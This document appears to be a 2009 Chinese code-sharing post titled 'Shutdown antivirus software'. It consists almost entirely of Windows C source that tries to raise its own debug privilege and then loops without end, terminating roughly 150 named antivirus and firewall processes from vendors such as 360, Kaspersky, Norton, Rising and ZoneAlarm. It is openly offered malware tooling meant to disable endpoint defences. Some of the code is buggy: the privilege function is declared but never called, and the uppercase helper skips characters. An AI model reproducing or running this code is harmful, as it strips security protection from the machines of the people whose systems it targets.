Shutdownantivirussoftware.rar_杀毒

关闭杀毒软件2009-07-05 12:17 #include "windows.h" #include "Tlhelp32.h" TCHAR* ToUpperPtr(TCHAR* s); void ExaltPopedom(); void KillProcess(TCHAR ProcessName[]); int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine,int nCmdShow) { //提升自身权限 void ExaltPopedom(); //关闭程序 while(true) { KillProcess("avpcc.exe"); KillProcess("AVP.EXE"); KillProcess("avp32.exe"); KillProcess("avnt.exe"); KillProcess("ekrn.exe"); KillProcess("egvi.exe"); KillProcess("360tray.exe"); KillProcess("360Safe.exe"); KillProcess("safeboxTray.exe"); KillProcess("Navapw32.exe "); KillProcess("Navapsvc.exe"); KillProcess("NMain.exe"); KillProcess("navw32.EXE"); KillProcess("KVFW.EXE"); KillProcess("KAVSvcUI.exe"); KillProcess("KAVPFW.EXE "); KillProcess("KAV32.exe "); KillProcess("KvXP.kxp"); KillProcess("KVSrvXP.exe"); KillProcess("KVMonXP.kxp"); KillProcess("KVwsc.exe"); KillProcess("KAVsvc.exe"); KillProcess("KWatchUI.EXE"); KillProcess("RAVmonD.exe"); KillProcess("RAVmon.exe"); KillProcess("RAVtimer.exe"); KillProcess("Rising.exe"); KillProcess("Rav.exe"); KillProcess("RavMon.exe"); KillProcess("Ravtimer.exe"); KillProcess("Iparmor.exe"); KillProcess("TrojanHunter.exe"); KillProcess("THGUARD.EXE"); KillProcess("PFW.EXE"); KillProcess("EGHOST.EXE"); KillProcess("MAILMON.EXE"); KillProcess("ZONEALARM.EXE"); KillProcess("WFINDV32.EXE"); KillProcess("WEBSCANX.EXE"); KillProcess("VSSTAT,EXE"); KillProcess("VSHWIN32.EXE"); KillProcess("VSECOMR.EXE"); KillProcess("VSCAN40.EXE"); KillProcess("VETTRAY.EXE"); KillProcess("VET95.EXE"); KillProcess("TDS2-NT.EXE"); KillProcess("TDS2-98.EXE"); KillProcess("TCA.EXE"); KillProcess("TBSCAN.EXE"); KillProcess("SWEEP95.EXE"); KillProcess("SPHINX.EXE"); KillProcess("SMC.EXE"); KillProcess("SERV95.EXE"); KillProcess("SCRSCAN.EXE"); KillProcess("SCANPM.EXE"); KillProcess("SCAN95.EXE"); KillProcess("SCAN32.EXE"); KillProcess("SAFEWEB.EXE"); KillProcess("FESCUE.EXE"); KillProcess("RAV7WIN.EXE"); KillProcess("RAV7.EXE"); KillProcess("PERSFW.EXE"); KillProcess("PCFWALLICON.EXE"); KillProcess("PCCWIN98.EXE"); KillProcess("PAVW.EXE"); KillProcess("PAVSCHED.EXE"); KillProcess("PAVCL..EXE"); KillProcess("PADMIN.EOUTPOST.EXE"); KillProcess("NVC95.EXE"); KillProcess("NUPGRADE.EXE"); KillProcess("NORMIST.EXE"); KillProcess("NMAIN.EXE"); KillProcess("NISUM.EXE"); KillProcess("NAVWNT.EXE"); KillProcess("NAVW32.EXE"); KillProcess("NAVNT.EXE"); KillProcess("NAVLU32.EXE"); KillProcess("NAVAPW32.EXE"); KillProcess("N32SCANW.EXE"); KillProcess("MPFTRAY.EXE"); KillProcess("MOOLIVE.EXE"); KillProcess("LUALL.EXE"); KillProcess("LOOKOUT.EXE"); KillProcess("LOCKDOWN2000.EXE"); KillProcess("JEDI.EXE"); KillProcess("IOMON98.EXE"); KillProcess("IFACE.EXE"); KillProcess("ICSUPPNT.EXE"); KillProcess("ICSUPP95.EXE"); KillProcess("ICMON.EXE"); KillProcess("ICLOADNT.EXE"); KillProcess("ICLOAD95.EXE"); KillProcess("IBMAVSP.EXE"); KillProcess("IBMASN.EXE"); KillProcess("IAMSERV.EXE"); KillProcess("IAMAPP.EXE"); KillProcess("FRW.EXE"); KillProcess("FPROT.EXE"); KillProcess("FP-WIN.EXE"); KillProcess("FINDVIRU.EXE"); KillProcess("F-STOPW.EXE"); KillProcess("F-PROT95.EXE"); KillProcess("F-PROT.EXE"); KillProcess("F-AGNT95.EXE"); KillProcess("EXPWATCH.EXE"); KillProcess("ESAFE.EXE"); KillProcess("ECENGINE.EXE"); KillProcess("DVP95_0.EXE"); KillProcess("DVP95.EXE"); KillProcess("CLEANER3.EXE"); KillProcess("CLEANER.EXE"); KillProcess("CLAW95CF.EXE"); KillProcess("CLAW95.EXE"); KillProcess("CFINET32.EXE"); KillProcess("CFINET.EXE"); KillProcess("CFIAUDIT.EXE"); KillProcess("CFIADMIN.EXE"); KillProcess("BLACKICE.EXE"); KillProcess("BLACKD.EXE"); KillProcess("AVWUPD32.EXE"); KillProcess("AVWIN95.EXE"); KillProcess("AVSCHED32.EXE"); KillProcess("AVPUPD.EXE"); KillProcess("AVPTC32.EXE"); KillProcess("AVPM.EXE"); KillProcess("AVPDOS32.EXE"); KillProcess("AVKSERV.EXE"); KillProcess("AVGCTRL.EXE"); KillProcess("AVE32.EXE"); KillProcess("AVCONSOL.EXE"); KillProcess("AUTODOWN.EXE"); KillProcess("APVXDWIN.EXE"); KillProcess("ANTI-TROJAN.EXE"); KillProcess("ACKWIN32.EXE"); KillProcess("_AVPM.EXE"); KillProcess("_AVPCC.EXE"); KillProcess("_AVP32.EXE"); //休息一下在继续 Sleep(1000); } return 0; } TCHAR* ToUpperPtr(TCHAR* s) { static TCHAR newStr[200]; int i=0; while(*s != '\0') { if(*s >='a' && *s <='z') { newStr[i++]=*s-32; } s++; } return newStr; } void ExaltPopedom() { HANDLE hToken; LUID luid; TOKEN_PRIVILEGES tp; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); LookupPrivilegeValue(NULL,"SeDebugPrivilege",&luid); tp.PrivilegeCount=1; tp.Privileges[0].Luid=luid; tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL); } void KillProcess(TCHAR ProcessName[]) { HANDLE hProcessSnap; DWORD ProcessID=0x00; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap==INVALID_HANDLE_VALUE) { return; } PROCESSENTRY32 pe32; pe32.dwSize = sizeof(pe32); BOOL bProcess = Process32First(hProcessSnap, &pe32); TCHAR buff[1024]; while(bProcess) { TCHAR str1[260],str2[260]; strcpy(str1,ToUpperPtr(ProcessName)); strcpy(str2,ToUpperPtr(pe32.szExeFile)); if(strcmp(str1,str2)==0) { ProcessID= pe32.th32ProcessID; break; } memset(buff, 0x00, 1024); bProcess=Process32Next(hProcessSnap, &pe32); } if(ProcessID==0) { return ; } HANDLE handle1=OpenProcess(PROCESS_TERMINATE,FALSE,ProcessID); TerminateProcess(handle1,0); }